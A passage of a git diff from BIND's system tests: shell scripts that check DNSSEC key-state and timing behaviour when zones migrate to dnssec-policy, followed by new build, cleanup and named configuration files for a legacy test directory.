Dsgn + retire-safety. +# TTLsig: 1d (86400 seconds) +# Dprp: 5m (300 seconds) +# Dsgn: 9d (777600 seconds) +# retire-safety: 1h (3600 seconds) +# IretZSK: 10d65m (867900 seconds) +active=$(key_get KEY2 ACTIVE) +set_addkeytime "KEY2" "RETIRED" "${active}" "${Lzsk}" +retired=$(key_get KEY2 RETIRED) +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Check key tags, should be the same. +n=$((n+1)) +echo_i "check that of zone ${ZONE} migration to dnssec-policy uses the same keys ($n)" +ret=0 +[ $_migrate_ksk = $(key_get KEY1 ID) ] || log_error "mismatch ksk tag" +[ $_migrate_zsk = $(key_get KEY2 ID) ] || log_error "mismatch zsk tag" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Testing a good migration (CSK). +# +set_zone "csk.kasp" +set_policy "default" "1" "7200" +set_server "ns3" "10.53.0.3" + +key_clear "KEY1" +key_set "KEY1" "LEGACY" "no" +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" + +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "rumoured" + +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# The key was immediately published and activated. +_created=$(key_get KEY1 CREATED) +set_keytime "KEY1" "PUBLISHED" "${_created}" +set_keytime "KEY1" "SYNCPUBLISH" "${_created}" +set_keytime "KEY1" "ACTIVE" "${_created}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Check key tags, should be the same. +n=$((n+1)) +echo_i "check that of zone ${ZONE} migration to dnssec-policy uses the same key ($n)" +ret=0 +[ $_migrate_csk = $(key_get KEY1 ID) ] || log_error "mismatch csk tag" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Testing a good migration (CSK, no SEP). +# +set_zone "csk-nosep.kasp" +set_policy "default" "1" "7200" +set_server "ns3" "10.53.0.3" + +key_clear "KEY1" +key_set "KEY1" "LEGACY" "no" +set_keyrole "KEY1" "csk" +key_set "KEY1" "FLAGS" "256" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" + +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "rumoured" + +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# The key was immediately published and activated. +_created=$(key_get KEY1 CREATED) +set_keytime "KEY1" "PUBLISHED" "${_created}" +set_keytime "KEY1" "SYNCPUBLISH" "${_created}" +set_keytime "KEY1" "ACTIVE" "${_created}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Check key tags, should be the same. +n=$((n+1)) +echo_i "check that of zone ${ZONE} migration to dnssec-policy uses the same key ($n)" +ret=0 +[ $_migrate_csk_nosep = $(key_get KEY1 ID) ] || log_error "mismatch csk tag" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Test migration to dnssec-policy, existing keys do not match key algorithm. +# +set_zone "migrate-nomatch-algnum.kasp" +set_policy "migrate-nomatch-algnum" "4" "300" +set_server "ns3" "10.53.0.3" +# The legacy keys need to be retired, but otherwise stay present until the +# new keys are omnipresent, and can be used to construct a chain of trust. +init_migration_keys "8" "RSASHA256" "2048" "2048" +init_migration_states "hidden" "omnipresent" +key_set "KEY1" "LEGACY" "no" +key_set "KEY2" "LEGACY" "no" + +set_keyrole "KEY3" "ksk" +set_keylifetime "KEY3" "0" +set_keyalgorithm "KEY3" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY3" "yes" +set_zonesigning "KEY3" "no" + +set_keyrole "KEY4" "zsk" +set_keylifetime "KEY4" "5184000" +set_keyalgorithm "KEY4" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY4" "no" +set_zonesigning "KEY4" "yes" + +set_keystate "KEY3" "GOAL" "omnipresent" +set_keystate "KEY3" "STATE_DNSKEY" "rumoured" +set_keystate "KEY3" "STATE_KRRSIG" "rumoured" +set_keystate "KEY3" "STATE_DS" "hidden" + +set_keystate "KEY4" "GOAL" "omnipresent" +set_keystate "KEY4" "STATE_DNSKEY" "rumoured" +set_keystate "KEY4" "STATE_ZRRSIG" "rumoured" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - KSK must be retired since it no longer matches the policy. +# P : now-3900s +# P sync: now-3h +# A : now-3900s +# - The key is removed after the retire interval: +# IretKSK = TTLds + DprpP + retire_safety. +# TTLds: 2h (7200 seconds) +# Dprp: 1h (3600 seconds) +# retire-safety: 1h (3600 seconds) +# IretKSK: 4h (14400 seconds) +IretKSK=14400 +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY1" "ACTIVE" "${created}" -3900 +set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -10800 +keyfile=$(key_get KEY1 BASEFILE) +grep "; Inactive:" "${keyfile}.key" > retired.test${n}.ksk +retired=$(awk '{print $3}' < retired.test${n}.ksk) +set_keytime "KEY1" "RETIRED" "${retired}" +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretKSK}" +# - ZSK must be retired since it no longer matches the policy. +# P: now-3900s +# A: now-12h +# - The key is removed after the retire interval: +# IretZSK = TTLsig + Dprp + Dsgn + retire-safety. +# TTLsig: 11h (39600 seconds) +# Dprp: 1h (3600 seconds) +# Dsgn: 9d (777600 seconds) +# retire-safety: 1h (3600 seconds) +# IretZSK: 9d13h (824400 seconds) +IretZSK=824400 +Lzsk=5184000 +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY2" "ACTIVE" "${created}" -43200 +keyfile=$(key_get KEY2 BASEFILE) +grep "; Inactive:" "${keyfile}.key" > retired.test${n}.zsk +retired=$(awk '{print $3}' < retired.test${n}.zsk) +set_keytime "KEY2" "RETIRED" "${retired}" +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" +# - The new KSK is immediately published and activated. +created=$(key_get KEY3 CREATED) +set_keytime "KEY3" "PUBLISHED" "${created}" +set_keytime "KEY3" "ACTIVE" "${created}" +# - It takes TTLsig + Dprp + publish-safety hours to propagate the zone. +# TTLsig: 11h (39600 seconds) +# Dprp: 1h (3600 seconds) +# publish-safety: 1h (3600 seconds) +# Ipub: 13h (46800 seconds) +Ipub=46800 +set_addkeytime "KEY3" "SYNCPUBLISH" "${created}" "${Ipub}" +# - The ZSK is immediately published and activated. +created=$(key_get KEY4 CREATED) +set_keytime "KEY4" "PUBLISHED" "${created}" +set_keytime "KEY4" "ACTIVE" "${created}" +active=$(key_get KEY4 ACTIVE) +set_addkeytime "KEY4" "RETIRED" "${active}" "${Lzsk}" +retired=$(key_get KEY4 RETIRED) +set_addkeytime "KEY4" "REMOVED" "${retired}" "${IretZSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Check key tags, should be the same. +n=$((n+1)) +echo_i "check that of zone ${ZONE} migration to dnssec-policy keeps existing keys ($n)" +ret=0 +[ $_migratenomatch_algnum_ksk = $(key_get KEY1 ID) ] || log_error "mismatch ksk tag" +[ $_migratenomatch_algnum_zsk = $(key_get KEY2 ID) ] || log_error "mismatch zsk tag" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Test migration to dnssec-policy, existing keys do not match key length. +# +set_zone "migrate-nomatch-alglen.kasp" +set_policy "migrate-nomatch-alglen" "4" "300" +set_server "ns3" "10.53.0.3" + +# The legacy keys need to be retired, but otherwise stay present until the +# new keys are omnipresent, and can be used to construct a chain of trust. +init_migration_keys "8" "RSASHA256" "2048" "2048" +init_migration_states "hidden" "omnipresent" +key_set "KEY1" "LEGACY" "no" +key_set "KEY2" "LEGACY" "no" + +set_keyrole "KEY3" "ksk" +set_keylifetime "KEY3" "0" +set_keyalgorithm "KEY3" "8" "RSASHA256" "3072" +set_keysigning "KEY3" "yes" +set_zonesigning "KEY3" "no" + +set_keyrole "KEY4" "zsk" +set_keylifetime "KEY4" "5184000" +set_keyalgorithm "KEY4" "8" "RSASHA256" "3072" +set_keysigning "KEY4" "no" +# This key is considered to be prepublished, so it is not yet signing. +set_zonesigning "KEY4" "no" + +set_keystate "KEY3" "GOAL" "omnipresent" +set_keystate "KEY3" "STATE_DNSKEY" "rumoured" +set_keystate "KEY3" "STATE_KRRSIG" "rumoured" +set_keystate "KEY3" "STATE_DS" "hidden" + +set_keystate "KEY4" "GOAL" "omnipresent" +set_keystate "KEY4" "STATE_DNSKEY" "rumoured" +set_keystate "KEY4" "STATE_ZRRSIG" "hidden" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - KSK must be retired since it no longer matches the policy. +# P : now-3900s +# P sync: now-3h +# A : now-3900s +# - The key is removed after the retire interval: +# IretKSK = TTLds + DprpP + retire_safety. +# TTLds: 2h (7200 seconds) +# Dprp: 1h (3600 seconds) +# retire-safety: 1h (3600 seconds) +# IretKSK: 4h (14400 seconds) +IretKSK=14400 +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY1" "ACTIVE" "${created}" -3900 +set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -10800 +keyfile=$(key_get KEY1 BASEFILE) +grep "; Inactive:" "${keyfile}.key" > retired.test${n}.ksk +retired=$(awk '{print $3}' < retired.test${n}.ksk) +set_keytime "KEY1" "RETIRED" "${retired}" +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretKSK}" +# - ZSK must be retired since it no longer matches the policy. +# P: now-3900s +# A: now-12h +# - The key is removed after the retire interval: +# IretZSK = TTLsig + Dprp + Dsgn + retire-safety. +# TTLsig: 11h (39600 seconds) +# Dprp: 1h (3600 seconds) +# Dsgn: 9d (777600 seconds) +# publish-safety: 1h (3600 seconds) +# IretZSK: 9d13h (824400 seconds) +IretZSK=824400 +Lzsk=5184000 +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY2" "ACTIVE" "${created}" -43200 +keyfile=$(key_get KEY2 BASEFILE) +grep "; Inactive:" "${keyfile}.key" > retired.test${n}.zsk +retired=$(awk '{print $3}' < retired.test${n}.zsk) +set_keytime "KEY2" "RETIRED" "${retired}" +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" +# - The new KSK is immediately published and activated. +created=$(key_get KEY3 CREATED) +set_keytime "KEY3" "PUBLISHED" "${created}" +set_keytime "KEY3" "ACTIVE" "${created}" +# - It takes TTLsig + Dprp + publish-safety hours to propagate the zone. +# TTLsig: 11h (39600 seconds) +# Dprp: 1h (3600 seconds) +# publish-safety: 1h (3600 seconds) +# Ipub: 13h (46800 seconds) +Ipub=46800 +set_addkeytime "KEY3" "SYNCPUBLISH" "${created}" "${Ipub}" +# - The ZSK is immediately published and activated. +created=$(key_get KEY4 CREATED) +set_keytime "KEY4" "PUBLISHED" "${created}" +set_keytime "KEY4" "ACTIVE" "${created}" +active=$(key_get KEY4 ACTIVE) +set_addkeytime "KEY4" "RETIRED" "${active}" "${Lzsk}" +retired=$(key_get KEY4 RETIRED) +set_addkeytime "KEY4" "REMOVED" "${retired}" "${IretZSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Check key tags, should be the same. +n=$((n+1)) +echo_i "check that of zone ${ZONE} migration to dnssec-policy keeps existing keys ($n)" +ret=0 +[ $_migratenomatch_alglen_ksk = $(key_get KEY1 ID) ] || log_error "mismatch ksk tag" +[ $_migratenomatch_alglen_zsk = $(key_get KEY2 ID) ] || log_error "mismatch zsk tag" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +######################################################## +# Testing key states derived from key timing metadata. # +######################################################## + +# Policy parameters. +# KSK has lifetime of 60 days (5184000 seconds). +# The KSK is removed after Iret = DprpP + TTLds + retire-safety = +# 4h = 14400 seconds. +Lksk=5184000 +IretKSK=14400 +# ZSK has lifetime of 60 days (5184000 seconds). +# The ZSK is removed after Iret = TTLsig + Dprp + Dsgn + retire-safety = +# 181h = 651600 seconds. +Lzsk=5184000 +IretZSK=651600 + +# +# Testing rumoured state. +# +set_zone "rumoured.kasp" +set_policy "timing-metadata" "2" "300" +set_server "ns3" "10.53.0.3" + +# Key properties, timings and metadata should be the same as legacy keys above. +init_migration_keys "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +init_migration_states "omnipresent" "rumoured" +key_set "KEY1" "LEGACY" "no" +key_set "KEY2" "LEGACY" "no" +set_keylifetime "KEY1" "${Lksk}" +set_keylifetime "KEY2" "${Lzsk}" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# +# Tds="now-2h" (7200) +# Tkey="now-300s" (300) +# Tsig="now-11h" (39600) +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "PUBLISHED" "${created}" -300 +set_addkeytime "KEY1" "ACTIVE" "${created}" -300 +set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -7200 +set_retired_removed "KEY1" "${Lksk}" "${IretKSK}" +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -300 +set_addkeytime "KEY2" "ACTIVE" "${created}" -39600 +set_retired_removed "KEY2" "${Lzsk}" "${IretZSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Check key tags, should be the same. +n=$((n+1)) +echo_i "check that of zone ${ZONE} migration to dnssec-policy uses the same keys ($n)" +ret=0 +[ $_rumoured_ksk = $(key_get KEY1 ID) ] || log_error "mismatch ksk tag" +[ $_rumoured_zsk = $(key_get KEY2 ID) ] || log_error "mismatch zsk tag" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Testing omnipresent state. +# +set_zone "omnipresent.kasp" +set_policy "timing-metadata" "2" "300" +set_server "ns3" "10.53.0.3" + +# Key properties, timings and metadata should be the same as legacy keys above. +init_migration_keys "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" "$DEFAULT_BITS" +init_migration_states "omnipresent" "omnipresent" +key_set "KEY1" "LEGACY" "no" +key_set "KEY2" "LEGACY" "no" +set_keylifetime "KEY1" "${Lksk}" +set_keylifetime "KEY2" "${Lzsk}" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# +# Tds="now-3h" (10800) +# Tkey="now-3900s" (3900) +# Tsig="now-12h" (43200) +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY1" "ACTIVE" "${created}" -3900 +set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -10800 +set_retired_removed "KEY1" "${Lksk}" "${IretKSK}" +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -3900 +set_addkeytime "KEY2" "ACTIVE" "${created}" -43200 +set_retired_removed "KEY2" "${Lzsk}" "${IretZSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Check key tags, should be the same. +n=$((n+1)) +echo_i "check that of zone ${ZONE} migration to dnssec-policy uses the same keys ($n)" +ret=0 +[ $_omnipresent_ksk = $(key_get KEY1 ID) ] || log_error "mismatch ksk tag" +[ $_omnipresent_zsk = $(key_get KEY2 ID) ] || log_error "mismatch zsk tag" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + + +###################################### +# Testing good migration with views. # +###################################### +init_view_migration() { + key_clear "KEY1" + key_set "KEY1" "LEGACY" "yes" + set_keyrole "KEY1" "ksk" + set_keylifetime "KEY1" "0" + set_keysigning "KEY1" "yes" + set_zonesigning "KEY1" "no" + + key_clear "KEY2" + key_set "KEY2" "LEGACY" "yes" + set_keyrole "KEY2" "zsk" + set_keylifetime "KEY2" "0" + set_keysigning "KEY2" "no" + set_zonesigning "KEY2" "yes" + + key_clear "KEY3" + key_clear "KEY4" + + set_keystate "KEY1" "GOAL" "omnipresent" + set_keystate "KEY1" "STATE_DNSKEY" "rumoured" + set_keystate "KEY1" "STATE_KRRSIG" "rumoured" + set_keystate "KEY1" "STATE_DS" "rumoured" + + set_keystate "KEY2" "GOAL" "omnipresent" + set_keystate "KEY2" "STATE_DNSKEY" "rumoured" + set_keystate "KEY2" "STATE_ZRRSIG" "rumoured" +} + +set_keytimes_view_migration() { + # Key is six months in use. + created=$(key_get KEY1 CREATED) + set_addkeytime "KEY1" "PUBLISHED" "${created}" -16070400 + set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -16070400 + set_addkeytime "KEY1" "ACTIVE" "${created}" -16070400 + created=$(key_get KEY2 CREATED) + set_addkeytime "KEY2" "PUBLISHED" "${created}" -16070400 + set_addkeytime "KEY2" "ACTIVE" "${created}" -16070400 +} + +# Zone view.rsasha256.kasp (external) +set_zone "view-rsasha256.kasp" +set_policy "rsasha256" "2" "300" +set_server "ns4" "10.53.0.4" +init_view_migration +set_keyalgorithm "KEY1" "8" "RSASHA256" "2048" +set_keyalgorithm "KEY2" "8" "RSASHA256" "2048" +TSIG="$DEFAULT_HMAC:external:$VIEW1" +wait_for_nsec +# Make sure the zone is signed with legacy keys. +check_keys +set_keytimes_view_migration +check_keytimes +dnssec_verify + +n=$((n+1)) +# check subdomain +echo_i "check TXT $ZONE (view ext) rrset is signed correctly ($n)" +ret=0 +dig_with_opts "view.${ZONE}" "@${SERVER}" TXT > "dig.out.$DIR.test$n.txt" || log_error "dig view.${ZONE} TXT failed" +grep "status: NOERROR" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "mismatch status in DNS response" +grep "view.${ZONE}\..*${DEFAULT_TTL}.*IN.*TXT.*external" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "missing view.${ZONE} TXT record in response" +check_signatures TXT "dig.out.$DIR.test$n.txt" "ZSK" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Remember legacy key tags. +_migrate_ext8_ksk=$(key_get KEY1 ID) +_migrate_ext8_zsk=$(key_get KEY2 ID) + +# Zone view.rsasha256.kasp (internal) +set_zone "view-rsasha256.kasp" +set_policy "rsasha256" "2" "300" +set_server "ns4" "10.53.0.4" +init_view_migration +set_keyalgorithm "KEY1" "8" "RSASHA256" "2048" +set_keyalgorithm "KEY2" "8" "RSASHA256" "2048" +TSIG="$DEFAULT_HMAC:internal:$VIEW2" +wait_for_nsec +# Make sure the zone is signed with legacy keys. +check_keys +set_keytimes_view_migration +check_keytimes +dnssec_verify + +n=$((n+1)) +# check subdomain +echo_i "check TXT $ZONE (view int) rrset is signed correctly ($n)" +ret=0 +dig_with_opts "view.${ZONE}" "@${SERVER}" TXT > "dig.out.$DIR.test$n.txt" || log_error "dig view.${ZONE} TXT failed" +grep "status: NOERROR" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "mismatch status in DNS response" +grep "view.${ZONE}\..*${DEFAULT_TTL}.*IN.*TXT.*internal" "dig.out.$DIR.test$n.txt" > /dev/null || log_error "missing view.${ZONE} TXT record in response" +check_signatures TXT "dig.out.$DIR.test$n.txt" "ZSK" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Remember legacy key tags. +_migrate_int8_ksk=$(key_get KEY1 ID) +_migrate_int8_zsk=$(key_get KEY2 ID) + +# Reconfig dnssec-policy. +echo_i "reconfig to switch to dnssec-policy" +copy_setports ns4/named2.conf.in ns4/named.conf +rndc_reconfig ns4 10.53.0.4 + +# Calculate time passed to correctly check for next key events. +now="$(TZ=UTC date +%s)" +time_passed=$((now-start_time)) +echo_i "${time_passed} seconds passed between start of tests and reconfig" + +# +# Testing migration (RSASHA256, views). +# +set_zone "view-rsasha256.kasp" +set_policy "rsasha256" "3" "300" +set_server "ns4" "10.53.0.4" +init_migration_keys "8" "RSASHA256" "2048" "2048" +init_migration_states "omnipresent" "rumoured" +# Key properties, timings and metadata should be the same as legacy keys above. +# However, because the keys have a lifetime, kasp will set the retired time. +key_set "KEY1" "LEGACY" "no" +set_keylifetime "KEY1" "31536000" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" + +key_set "KEY2" "LEGACY" "no" +set_keylifetime "KEY2" "8035200" +set_keystate "KEY2" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent" +# The ZSK needs to be replaced. +set_keystate "KEY2" "GOAL" "hidden" +set_keystate "KEY3" "GOAL" "omnipresent" +set_keyrole "KEY3" "zsk" +set_keylifetime "KEY3" "8035200" +set_keyalgorithm "KEY3" "8" "RSASHA256" "2048" +set_keysigning "KEY3" "no" +set_zonesigning "KEY3" "no" # not yet +set_keystate "KEY3" "STATE_DNSKEY" "rumoured" +set_keystate "KEY3" "STATE_ZRRSIG" "hidden" + +# Various signing policy checks (external). +TSIG="$DEFAULT_HMAC:external:$VIEW1" +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" "ext" +set_keytimes_view_migration + +# Set expected key times: +published=$(key_get KEY1 PUBLISHED) +set_keytime "KEY1" "ACTIVE" "${published}" +set_keytime "KEY1" "SYNCPUBLISH" "${published}" +# Lifetime: 1 year (8035200 seconds) +active=$(key_get KEY1 ACTIVE) +set_addkeytime "KEY1" "RETIRED" "${active}" "31536000" +# Retire interval: +# DS TTL: 1d +# Parent zone propagation: 3h +# Retire safety: 1h +# Total: 100800 seconds +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "100800" + +published=$(key_get KEY2 PUBLISHED) +set_keytime "KEY2" "ACTIVE" "${published}" +# Lifetime: 3 months (8035200 seconds) +active=$(key_get KEY2 ACTIVE) +set_addkeytime "KEY2" "RETIRED" "${active}" "8035200" +# Retire interval: +# Sign delay: 9d (14-5) +# Max zone TTL: 1d +# Retire safety: 1h +# Zone propagation delay: 300s +# Total: 867900 seconds +retired=$(key_get KEY2 RETIRED) +set_addkeytime "KEY2" "REMOVED" "${retired}" "867900" + +created=$(key_get KEY3 CREATED) +set_keytime "KEY3" "PUBLISHED" "${created}" +# Publication interval: +# DNSKEY TTL: 300s +# Publish safety: 1h +# Zone propagation delay: 300s +# Total: 4200 seconds +set_addkeytime "KEY3" "ACTIVE" "${created}" "4200" +# Lifetime: 3 months (8035200 seconds) +active=$(key_get KEY3 ACTIVE) +set_addkeytime "KEY3" "RETIRED" "${active}" "8035200" +# Retire interval: +# Sign delay: 9d (14-5) +# Max zone TTL: 1d +# Retire safety: 1h +# Zone propagation delay: 300s +# Total: 867900 seconds +retired=$(key_get KEY3 RETIRED) +set_addkeytime "KEY3" "REMOVED" "${retired}" "867900" + +# Continue signing policy checks. +check_keytimes +check_apex +dnssec_verify + +# Various signing policy checks (internal). +TSIG="$DEFAULT_HMAC:internal:$VIEW2" +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" "int" +set_keytimes_view_migration +check_keytimes +check_apex +dnssec_verify + +# Check key tags, should be the same. +n=$((n+1)) +echo_i "check that of zone ${ZONE} migration to dnssec-policy uses the same keys ($n)" +ret=0 +[ $_migrate_ext8_ksk = $_migrate_int8_ksk ] || log_error "mismatch ksk tag" +[ $_migrate_ext8_zsk = $_migrate_int8_zsk ] || log_error "mismatch zsk tag" +[ $_migrate_ext8_ksk = $(key_get KEY1 ID) ] || log_error "mismatch ksk tag" +[ $_migrate_ext8_zsk = $(key_get KEY2 ID) ] || log_error "mismatch zsk tag" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/legacy/build.sh b/bin/tests/system/legacy/build.sh new file mode 100644 index 0000000..5aeeb9c --- /dev/null +++ b/bin/tests/system/legacy/build.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +(cd ns6 && $SHELL -e sign.sh) +(cd ns7 && $SHELL -e sign.sh) + +$SHELL clean.sh diff --git a/bin/tests/system/legacy/clean.sh b/bin/tests/system/legacy/clean.sh new file mode 100644 index 0000000..4c65a2d --- /dev/null +++ b/bin/tests/system/legacy/clean.sh @@ -0,0 +1,31 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out.* +rm -f ns*/named.conf +rm -f ns*/named.memstats +rm -f ns*/named.run +rm -f ns*/named.lock + +# build.sh +rm -f ns1/named_dump.db* +rm -f ns6/K* +rm -f ns6/dsset-* +rm -f ns6/edns512.db +rm -f ns6/signer.err +rm -f ns7/K* +rm -f ns7/dsset-* +rm -f ns7/edns512-notcp.db +rm -f ns7/signer.err +rm -f ns7/trusted.conf +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/legacy/ns1/named1.conf.in b/bin/tests/system/legacy/ns1/named1.conf.in new file mode 100644 index 0000000..7f8e897 --- /dev/null +++ b/bin/tests/system/legacy/ns1/named1.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + max-udp-size 4096; + edns-udp-size 4096; + nocookie-udp-size 4096; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/legacy/ns1/named2.conf.in b/bin/tests/system/legacy/ns1/named2.conf.in new file mode 100644 index 0000000..9d4f1f6 --- /dev/null +++ b/bin/tests/system/legacy/ns1/named2.conf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + max-udp-size 4096; + edns-udp-size 4096; + nocookie-udp-size 4096; +}; + +zone "." { + type primary; + file "root.db"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/legacy/ns1/root.db b/bin/tests/system/legacy/ns1/root.db new file mode 100644 index 0000000..175847a --- /dev/null +++ b/bin/tests/system/legacy/ns1/root.db @@ -0,0 +1,33 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +. 